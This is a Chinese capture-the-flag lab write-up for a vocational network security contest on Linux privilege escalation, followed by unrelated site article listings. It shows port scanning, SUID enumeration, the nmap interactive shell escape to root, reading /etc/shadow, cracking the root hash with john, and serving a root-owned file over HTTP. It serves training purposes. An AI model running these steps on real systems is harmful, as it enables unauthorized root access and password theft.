2023年中职“网络安全“—Linux系统深入提权③

简介: 2023年中职“网络安全“—Linux系统深入提权③

Linux系统深入提权

任务环境说明:

  • 服务器场景:Server2202(关闭链接)
  • 用户名:hacker密码:123456

1. 使用深入机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;

nmap -p- -sV -T4 -n 靶机IP
# -p- 全部端口
# -sV 版本探测
# -T4 针对TCP端口禁止动态扫描延迟超过10ms
# -n 不做DNS解析


ef09b8d91bcda481a7897d2bcaf9c40e.png

lag: 22/tcp

2. 使用深入机对服务器信息收集,并将服务器中主机名称作为flag提交;

uname -a            # 输出操作系统信息

97b3de3375f50bb670ef87a767f9a296.png

lag: Kiowizity

3. 使用深入机对服务器信息收集,并将服务器中系统内核版本作为flag提交;

uname -a            # 输出操作系统信息

6fe9d044bb6155179f53f5bdda7d8a57.png

flag: 3.13.0-45-generic

4. 使用深入机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;

ls /root
cat /root/adftutij.txt

cd76bbf1a638509436e1656a7ec68da6.png

flag: hyjufk983

5. 使用深入机对服务器管理员提权,并将服务器中root的密码作为flag提交;

find / -perm -u=s -type f 2>/dev/null
# find 查找命令
# / 从根目录开始
# -perm 查找权限
# -u=s 有suid权限的文件
# -type 文件类型
# -f 普通文件
# 2 标准错误输出
# > 输
# /dev/null 空设备文件

8e857c0bdf88973cf2fb774f087969fc.png

nmap --interactive        # 进入nmap交互模式
!sh                       # 执行sh
id                        # 查看id
cat /etc/shadow           # shadow 文件保存密码

26c48efe48b41028096b790ebb55cd01.png

vim hash        # 把root信息行写入进去
cat hash        # 查看是否赋值成功
john hash       # 破解hash

b12dbd681ec0f770abb30a4e72d8078b.png

flag: 0987654321

6. 使用深入机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。

pwd                                # 查看当前目录
copy /root/flag.jpg flag.jpg       # 复制过来
python -m SimpleHTTPServer 8080    # 在8080端口开启一个HTTP服务

4e9dfef5be0e9340995474ff90450b0d.png

注意一定要加:8080 指定HTTP端口

51b4adeb25cea21cbf11e5691944b01a.png

flag: 2022_year_Skill_competition


目录
相关文章
|
8天前
|
机器学习/深度学习 人工智能 算法
猫狗宠物识别系统Python+TensorFlow+人工智能+深度学习+卷积网络算法
宠物识别系统使用Python和TensorFlow搭建卷积神经网络,基于37种常见猫狗数据集训练高精度模型,并保存为h5格式。通过Django框架搭建Web平台,用户上传宠物图片即可识别其名称,提供便捷的宠物识别服务。
128 55
|
6天前
|
存储 缓存 监控
Linux缓存管理:如何安全地清理系统缓存
在Linux系统中,内存管理至关重要。本文详细介绍了如何安全地清理系统缓存,特别是通过使用`/proc/sys/vm/drop_caches`接口。内容包括清理缓存的原因、步骤、注意事项和最佳实践,帮助你在必要时优化系统性能。
118 78
|
18天前
|
机器学习/深度学习 人工智能 算法
【宠物识别系统】Python+卷积神经网络算法+深度学习+人工智能+TensorFlow+图像识别
宠物识别系统,本系统使用Python作为主要开发语言,基于TensorFlow搭建卷积神经网络算法,并收集了37种常见的猫狗宠物种类数据集【'阿比西尼亚猫(Abyssinian)', '孟加拉猫(Bengal)', '暹罗猫(Birman)', '孟买猫(Bombay)', '英国短毛猫(British Shorthair)', '埃及猫(Egyptian Mau)', '缅因猫(Maine Coon)', '波斯猫(Persian)', '布偶猫(Ragdoll)', '俄罗斯蓝猫(Russian Blue)', '暹罗猫(Siamese)', '斯芬克斯猫(Sphynx)', '美国斗牛犬
106 29
【宠物识别系统】Python+卷积神经网络算法+深度学习+人工智能+TensorFlow+图像识别
|
10天前
|
Linux Shell 网络安全
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
本指南介绍如何利用 HTA 文件和 Metasploit 框架进行渗透测试。通过创建反向 shell、生成 HTA 文件、设置 HTTP 服务器和发送文件,最终实现对目标系统的控制。适用于教育目的,需合法授权。
42 9
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
|
6天前
|
存储 监控 Linux
嵌入式Linux系统编程 — 5.3 times、clock函数获取进程时间
在嵌入式Linux系统编程中,`times`和 `clock`函数是获取进程时间的两个重要工具。`times`函数提供了更详细的进程和子进程时间信息,而 `clock`函数则提供了更简单的处理器时间获取方法。根据具体需求选择合适的函数,可以更有效地进行性能分析和资源管理。通过本文的介绍,希望能帮助您更好地理解和使用这两个函数,提高嵌入式系统编程的效率和效果。
50 13
|
4天前
|
数据采集 监控 安全
公司网络监控软件:Zig 语言底层优化保障系统高性能运行
在数字化时代,Zig 语言凭借出色的底层控制能力和高性能特性,为公司网络监控软件的优化提供了有力支持。从数据采集、连接管理到数据分析,Zig 语言确保系统高效稳定运行,精准处理海量网络数据,保障企业信息安全与业务连续性。
23 4
|
1月前
|
安全 Windows
【Azure Cloud Service】在Windows系统中抓取网络包 ( 不需要另外安全抓包工具)
通常,在生产环境中,为了保证系统环境的安全和纯粹,是不建议安装其它软件或排查工具(如果可以安装,也是需要走审批流程)。 本文将介绍一种,不用安装Wireshark / tcpdump 等工具,使用Windows系统自带的 netsh trace 命令来获取网络包的步骤
69 32
|
28天前
|
弹性计算 监控 数据库
制造企业ERP系统迁移至阿里云ECS的实例,详细介绍了从需求分析、数据迁移、应用部署、网络配置到性能优化的全过程
本文通过一个制造企业ERP系统迁移至阿里云ECS的实例,详细介绍了从需求分析、数据迁移、应用部署、网络配置到性能优化的全过程,展示了企业级应用上云的实践方法与显著优势,包括弹性计算资源、高可靠性、数据安全及降低维护成本等,为企业数字化转型提供参考。
52 5
|
1月前
|
存储 数据可视化 API
重磅干货,免费三方网络验证[用户系统+CDK]全套API接口分享教程。
本套网络验证系统提供全面的API接口,支持用户注册、登录、数据查询与修改、留言板管理等功能,适用于不想自建用户系统的APP开发者。系统还包含CDK管理功能,如生成、使用、查询和删除CDK等。支持高自定义性,包括20个自定义字段,满足不同需求。详细接口参数及示例请参考官方文档。
|
1月前
|
Ubuntu Linux 网络安全
linux系统ubuntu中在命令行中打开图形界面的文件夹
在Ubuntu系统中,通过命令行打开图形界面的文件夹是一个高效且实用的操作。无论是使用Nautilus、Dolphin还是Thunar,都可以根据具体桌面环境选择合适的文件管理器。通过上述命令和方法,可以简化日常工作,提高效率。同时,解决权限问题和图形界面问题也能确保操作的顺利进行。掌握这些技巧,可以使Linux操作更加便捷和灵活。
24 3